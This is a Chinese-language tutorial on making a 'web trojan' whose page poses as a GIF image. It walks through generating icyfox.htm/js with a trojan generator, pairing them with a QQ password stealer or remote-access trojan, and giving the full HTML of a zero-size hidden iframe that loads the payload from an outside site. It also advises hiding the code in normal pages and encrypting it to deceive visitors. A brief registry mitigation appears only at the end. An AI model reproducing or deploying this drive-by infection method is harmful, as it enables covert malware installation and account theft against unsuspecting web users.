今天抽了点时间制作 了几个网页木马,效果都不是很好,主要是隐藏性差,容易被人发现,琢磨了一个下午,终于制作 出了一个隐藏性比较理想的网页木马.这款新的网页木马与别的不同的是后缀是.gif的,而不像其他的后缀是.htm或.asp,下面我就教大家如何制作 后缀为gif的网页木马.

首先我们需要准备几款工具:

1.冰狐浪子网页木马生成器

2.一个网页编辑器(frontpage或dreamweaver都可以,我习惯用的是dreamweaver);

3.图片一张(主要用来起迷惑作用,至于放什么样的图片大家可以自由发挥)

4.木马一个,至于是QQ盗号器?灰鸽子?还是黑洞?都可以,我建议大家准备一个50KB以下的小马,否则木马还没运行,网页就先被用户关了,准备好以上几款工具,接下来我们就开始做这几个网页木马!

首先把你的木马复制到冰狐浪子网页木马生成器所在的文件夹里把它改名为#.exe,然后双击冰狐浪子超级网页木马生成器就会看到在同目录下生成两个文件.icyfox.htm和icyfox.js,

接下来把他们上传到你的空间上,我们假设icyfox.htm文件的网址为http://www.dwcn.cn/asp/icyfox.htm

下面我们打开网页编辑器,新建一个网页,点击"插入"---"图片"打开插入图片的对话框,选择刚才准备好的图片按确定。

然后转到代码编辑窗口,插入一个嵌入式框架,把框架长度和宽度都改为0,框架连接到刚才icyfox.htm文件的网址,我们这里连接到http://www.xxx.cn/asp/icyfox.htm或者直接输入以下代码:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional// EN" 
"htp://www.w3.org/TR/html4/loose.dtd"> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html;charset=gb2312"> 
<title></title> 
</head> 
</head> 
<table> 
<td height="0" style="border:2px dotted #999999"> 
<IFRAME align=center name="target" frame Border=0 height=0 scrolling=no 
src="http://www.dwcn.cn/asp/icyfox.htm" width=0></IFRAME> 
</p> 
</td> 
</table> 
<body> 
<img src="hehe.jpg" width="702" height="402"> 
</body> 
</html>

把然后运行"生成.bat",你会在"muma"目录下得到文件"icyfox.js"

修改"icyfox.htm"文件中的两处

http://www.xxx.y365.com/muma

为你上传到主页空间的"icyfox.js"文件的URL路径

最后把"muma"目录下"icyfox.js"和"icyfox.htm"上传到你的主页空间,访问"icyfox.htm"就会运行相应的木马程序!

建议对"icyfox.htm"进行加密处理,防止泄露!

"icyfox.js"和"icyfox.htm"两者并不需要在同一空间,也就是说你可以把"icyfox.htm"文件中的代码插入到一些正常的网页中以迷惑人!^*^

弥补漏洞

修改本地安全属性，相应的注册表键值为：

HKEY_CURRENT_USER\Software\Microsoft\Windows

\CurrentVersion\InternetSettings\Zones\0

下的1004项的值由原来的０改为十六进制的３。